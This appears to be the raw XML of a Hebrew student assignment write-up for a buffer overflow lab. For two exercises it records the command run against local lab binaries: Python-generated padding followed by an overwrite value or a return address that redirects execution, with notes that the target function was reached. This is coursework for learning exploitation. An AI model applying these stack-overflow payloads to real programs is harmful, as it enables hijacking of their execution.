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DD82A" w14:textId="17DC2F46" w:rsidR="00623976" w:rsidRDefault="00005825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0E4208" wp14:editId="38C2881C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1939636</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4232564</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3712941" cy="2620309"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="7104940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940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441" cy="262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E5E32" wp14:editId="4876672E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-748145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-471055</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6546215" cy="9788237"/>
                <wp:effectExtent l="0" t="0" r="26035" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1741612494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215" cy="9788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163D1" w14:textId="6ABAB502" w:rsidR="00005825" w:rsidRDefault="0000582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בס"ד</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="14055D7C" w14:textId="0979462F" w:rsidR="00005825" w:rsidRDefault="0000582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שאלה 2:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="14F4718A" w14:textId="4CA3EB5E" w:rsidR="00005825" w:rsidRDefault="00005825">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:cs="Arial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הרצנו בארמינל את הפקודה הבאה: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:rtl/>
                              </w:rPr>
                              <w:t>./</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:t>overflow2c5 `python -c "print ('A'*84+'\x000000'+'\x01')</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:rtl/>
                              </w:rPr>
                              <w:t>"`</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7A8B275D" w14:textId="57C7C8E6" w:rsidR="00005825" w:rsidRDefault="00005825">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:cs="Arial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rtl/>
                              </w:rPr>
                              <w:t>ואכן הגענו לניצחון:</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0000582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129FC644" w14:textId="0373CEFF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374EAF3B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1E6D5A4C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4F22D926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77FDEA1D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46992B57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62674A86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18EED8E6" w14:textId="77777777" w:rsidR="00005825" w:rsidRDefault="00005825">
                            <w:pPr>
                              <w:rPr>
                                <w:rtl/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="0DDFAC94" w14:textId="4E342970" w:rsidR="00005825" w:rsidRDefault="0000582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שאלה 3:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5473FED6" w14:textId="77777777" w:rsidR="00005825" w:rsidRPr="00005825" w:rsidRDefault="00005825" w:rsidP="00005825">
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="cs"/>
                                <w:rtl/>
                              </w:rPr>
                              <w:t xml:space="preserve">הרצנו בטרמינל את הפקודה הבאה: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:rtl/>
                              </w:rPr>
                              <w:t>./</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:t>overflow3c5 `python -c "print ('A'*52+'\x68\x86\x04\x08')</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00005825">
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:rtl/>
                              </w:rPr>
                              <w:t xml:space="preserve">"` </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AC85C1C" w14:textId="389DC6B0" w:rsidR="00005825" w:rsidRDefault="0000582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ואכן הגענו לפונ' המבוקשת:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0041AAAD" w14:textId="58C7998D" w:rsidR="00005825" w:rsidRPr="00005825" w:rsidRDefault="000058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5E32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58.9pt;margin-top:-37.1pt;width:515.45pt;height:77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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="05A163D1" w14:textId="6ABAB502" w:rsidR="00005825" w:rsidRDefault="0000582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בס"ד</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="14055D7C" w14:textId="0979462F" w:rsidR="00005825" w:rsidRDefault="0000582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שאלה 2:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="14F4718A" w14:textId="4CA3EB5E" w:rsidR="00005825" w:rsidRDefault="00005825">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:cs="Arial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הרצנו בארמינל את הפקודה הבאה: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t>./</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:t>overflow2c5 `python -c "print ('A'*84+'\x000000'+'\x01')</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t>"`</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7A8B275D" w14:textId="57C7C8E6" w:rsidR="00005825" w:rsidRDefault="00005825">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:rtl/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Arial" w:hint="cs"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t>ואכן הגענו לניצחון:</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="129FC644" w14:textId="0373CEFF" w:rsidR="00005825" w:rsidRDefault="00005825">
                      <w:pPr>
                        <w:rPr>
                          <w:rtl/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="374EAF3B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1E6D5A4C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4F22D926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77FDEA1D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46992B57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62674A86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18EED8E6" w14:textId="77777777" w:rsidR="00005825" w:rsidRDefault="00005825">
                      <w:pPr>
                        <w:rPr>
                          <w:rtl/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="0DDFAC94" w14:textId="4E342970" w:rsidR="00005825" w:rsidRDefault="0000582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שאלה 3:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5473FED6" w14:textId="77777777" w:rsidR="00005825" w:rsidRPr="00005825" w:rsidRDefault="00005825" w:rsidP="00005825">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="cs"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t xml:space="preserve">הרצנו בטרמינל את הפקודה הבאה: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t>./</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:t>overflow3c5 `python -c "print ('A'*52+'\x68\x86\x04\x08')</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00005825">
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:rtl/>
                        </w:rPr>
                        <w:t xml:space="preserve">"` </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AC85C1C" w14:textId="389DC6B0" w:rsidR="00005825" w:rsidRDefault="0000582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ואכן הגענו לפונ' המבוקשת:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0041AAAD" w14:textId="58C7998D" w:rsidR="00005825" w:rsidRPr="00005825" w:rsidRDefault="00005825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088BEA3" wp14:editId="72F193DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2417445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>816898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3281495" cy="2389909"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9676165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165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95" cy="2389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3976" w:rsidSect="0098667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25"/>
    <w:rsid w:val="00005825"/>
    <w:rsid w:val="00623976"/>
    <w:rsid w:val="00986677"/>
    <w:rsid w:val="00EC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CB6B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0381AD-4C9D-4EC3-8125-00A59EE3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before="160" w:after="160" w:line="32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חיים הרביץ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>חיים הרביץ</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-27T16:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-27T17:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>